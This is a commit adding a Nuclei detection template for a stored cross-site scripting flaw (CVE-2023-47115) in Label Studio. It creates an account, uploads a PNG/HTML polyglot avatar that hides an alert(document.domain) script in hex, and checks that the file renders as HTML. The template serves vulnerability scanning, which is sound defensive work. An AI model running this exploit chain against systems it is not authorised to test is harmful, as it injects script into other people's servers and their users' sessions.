Create CVE-2023-47115.yaml

2024-01-30 01:49:31 +09:00 · 2024-01-30 01:49:31 +09:00 · fa5123e17d
parent 5d2f622a28
commit fa5123e17d
1 changed files with 81 additions and 0 deletions
--- a/http/cves/2023/CVE-2023-47115.yaml
+++ b/http/cves/2023/CVE-2023-47115.yaml
@ -0,0 +1,81 @@
+id: CVE-2023-47115
+
+info:
+  name: Stored Cross-Site Scripting Vulnerability in Label Studio
+  author: isacaya
+  severity: high
+  description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
+  impact: |
+    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
+  remediation: |
+    Update to version 1.9.2.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
+    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
+    cvss-score: 7.1
+    cve-id: CVE-2023-47115
+    cwe-id: CWE-79
+  tags: cve,cve2023,xss,authenticated
+
+http:
+  - raw:
+      - |
+        GET /user/login/ HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /user/signup/?&next=/projects/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
+      - |
+        GET /api/current-user/whoami HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        POST /api/users/{{id}}/avatar/ HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF
+
+        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
+        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
+        Content-Type: image/png
+
+        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
+        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
+      - |
+        GET /api/current-user/whoami HTTP/1.1
+        Host: {{Hostname}}
+      - |
+        GET {{filename}} HTTP/1.1
+        Host: {{Hostname}}
+
+    extractors:
+      - type: xpath
+        name: csrftoken
+        internal: true
+        attribute: value
+        xpath:
+          - '/html/body/div/form/input'
+      - type: json
+        part: body
+        name: id
+        internal: true
+        json:
+          - '.id'
+      - type: json
+        part: body
+        name: filename
+        internal: true
+        json:
+          - '.avatar'
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains(header, 'text/html')"
+          - "status_code == 200"
+          - 'contains(body, "<script>alert(document.domain)</script>")'
+        condition: and